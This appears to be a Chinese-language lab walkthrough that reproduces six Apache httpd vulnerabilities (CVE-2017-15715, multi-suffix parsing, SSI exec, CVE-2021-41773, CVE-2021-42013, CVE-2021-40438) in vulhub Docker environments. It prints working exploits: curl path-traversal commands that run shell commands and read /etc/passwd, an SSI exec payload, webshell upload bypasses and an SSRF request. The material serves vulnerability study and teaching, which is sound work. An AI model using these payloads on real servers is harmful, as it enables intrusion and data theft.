一、Apache HTTPD 換行解析漏洞
漏洞編號(hào):CVE-2017-15715
Apache HTTPD是一款HTTP服務(wù)器,它可以通過mod_php來運(yùn)行PHP網(wǎng)頁。
其2.4.0~2.4.29版本中存在一個(gè)解析漏洞。
在解析PHP時(shí),1.php\x0A將被按照PHP后綴進(jìn)行解析,導(dǎo)致繞過一些服務(wù)器的安全策略。
①環(huán)境啟用
cd vulhub/httpd/CVE-2017-15715
②編譯和運(yùn)行
docker-compose build
docker-compose up -d
③訪問漏洞環(huán)境
http://192.168.200.3:8080/
編寫一句話木馬上傳文件123.php,上傳都是失敗的
④解決方法
在123.php后面插入一個(gè)**\x0A**(注意,不能是\x0D\x0A,只能是一個(gè)\x0A),不再攔截,這里只需要選中0d,右擊選擇insert byte…后,輸入0a即可插入至里面,然后發(fā)送。
二、Apache HTTPD 多后綴解析漏洞
漏洞概述:Apache HTTPD 支持一個(gè)文件擁有多個(gè)后綴,并為不同后綴執(zhí)行不同的指令,比如配置文件: AddHandler application/x-httpd-php .php。在有多個(gè)后綴的情況下,只要一個(gè)文件含有.php后綴的文件即將被識(shí)別成PHP文件,沒必要是最后一個(gè)后綴。利用這個(gè)特性,將會(huì)造成一個(gè)可以繞過上傳白名單的解析漏洞。
①環(huán)境啟用
cd /vulhub/httpd/apache_parsing_vulnerability
②運(yùn)行環(huán)境
docker-compose up -d
③訪問漏洞環(huán)境
http://192.168.200.3
④解決方法
<?=phpinfo()?>
白名單檢查文件后綴的上傳組件,上傳完成后并未重命名。我們可以通過上傳文件名為xxx.php.jpg或xxx.php.jpeg的文件,利用Apache解析漏洞進(jìn)行g(shù)etshell。
三、Apache SSI 遠(yuǎn)程命令執(zhí)行漏洞
在測試任意文件上傳漏洞的時(shí)候,目標(biāo)服務(wù)端可能不允許上傳php后綴的文件。如果目標(biāo)服務(wù)器開啟了SSI與CGI支持,我們可以上傳一個(gè)shtml文件,并利用
語法執(zhí)行任意命令
①環(huán)境啟用
cd /vulhub/httpd/ssi-rce
②運(yùn)行一個(gè)支持SSI與CGI的Apache服務(wù)器
docker-compose up -d
③訪問漏洞環(huán)境
http://192.168.200.3:8080/upload.php
④解決方法
正常上傳PHP文件是不允許的,我們可以上傳一個(gè)shell.shtml文件:
<!--#exec cmd="ls" --> # 可以使用其他指令
四、Apache HTTP 路徑穿越漏洞
漏洞編號(hào):CVE-2021-41773
在其2.4.49版本中,引入了一個(gè)路徑穿越漏洞,滿足下面兩個(gè)條件的Apache服務(wù)器將會(huì)受到影響:
- 版本等于2.4.49
- 穿越的目錄允許被訪問(默認(rèn)情況下是不允許的)
攻擊者利用這個(gè)漏洞,可以讀取位于Apache服務(wù)器Web目錄以外的其他文件,或者讀取Web目錄中的腳本文件源碼,或者在開啟了cgi或cgid的服務(wù)器上執(zhí)行任意命令
①環(huán)境啟用
cd /vulhub/httpd/CVE-2021-41773
②執(zhí)行以下命令以啟動(dòng)易受攻擊的 Apache HTTP 服務(wù)器
docker-compose build
docker-compose up -d
③訪問漏洞環(huán)境
http://192.168.200.3:8080/
④解決方法
使用如下CURL命令來發(fā)送Payload(注意其中的**/icons/**必須是一個(gè)存在且可訪問的目錄):
curl -v --data "echo;id" 'http://192.168.200.3:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
在服務(wù)端開啟了cgi或cgid這兩個(gè)mod的情況下,這個(gè)路徑穿越漏洞將可以執(zhí)行任意命令:
curl -v --data "echo;id" 'http://192.168.200.3:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
curl -v --data "echo;whoami" 'http://192.168.200.3:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
五、Apache HTTP 路徑穿越漏洞
漏洞編號(hào):CVE-2021-42013
Apache HTTP 服務(wù)器項(xiàng)目旨在為包括 UNIX 和 Windows 在內(nèi)的現(xiàn)代操作系統(tǒng)開發(fā)和維護(hù)開源 HTTP 服務(wù)器。
CVE-2021-42013 是一個(gè)漏洞,由 CVE-2021-41773 修復(fù)不完整導(dǎo)致,攻擊者可以使用路徑遍歷攻擊將 URL 映射到類別名指令配置的目錄之外的文件。
此漏洞影響 Apache HTTP Server 2.4.49 和 2.4.50,而不是早期版本。
①環(huán)境啟用
cd /vulhub/httpd/CVE-2021-42013
②執(zhí)行以下命令以啟動(dòng)易受攻擊的 Apache HTTP 服務(wù)器
docker-compose build
docker-compose up -d
③訪問漏洞環(huán)境
http://192.168.200.3:8080
④解決方法
Apache HTTP 服務(wù)器 2.4.50 修補(bǔ)了以前的 CVE-2021-41773 有效負(fù)載,例如 ,但它不完整。http://your:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
用于繞過修補(bǔ)程序(請(qǐng)注意,必須是現(xiàn)有目錄):.%%32%65/icons/,但我們可以使用**.%%32%65進(jìn)行繞過(注意其中的/icons/**必須是一個(gè)存在且可訪問的目錄):
curl -v --path-as-is http://192.168.200.3:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
已成功披露:/etc/passwd
服務(wù)端開啟了cgi或cgid這兩個(gè)mod的情況下,這個(gè)路徑穿越漏洞將可以執(zhí)行任意命令:
curl -v --data "echo;id" 'http://192.168.200.3:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
六、Apache HTTP SSRF漏洞
漏洞編號(hào):CVE-2021-40438
Apache HTTP Server是Apache基金會(huì)開源的一款流行的HTTP服務(wù)器。在其2.4.48及以前的版本中,mod_proxy模塊存在一處邏輯錯(cuò)誤導(dǎo)致攻擊者可以控制反向代理服務(wù)器的地址,進(jìn)而導(dǎo)致SSRF漏洞。
①環(huán)境啟用
cd /vulhub/httpd/CVE-2021-40438
②執(zhí)行以下命令以啟動(dòng)易受攻擊的 Apache HTTP 服務(wù)器:
docker compose build
docker compose up -d
③訪問漏洞環(huán)境
192.168.200.3:8080?
文章來源:http://www.zghlxwxcb.cn/news/detail-833887.html
④解決方法
構(gòu)造POC:文章來源地址http://www.zghlxwxcb.cn/news/detail-833887.html
GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://example.com/ HTTP/1.1
Host: 192.168.200.3:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
到了這里,關(guān)于Apache Httpd 常見漏洞解析(全)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!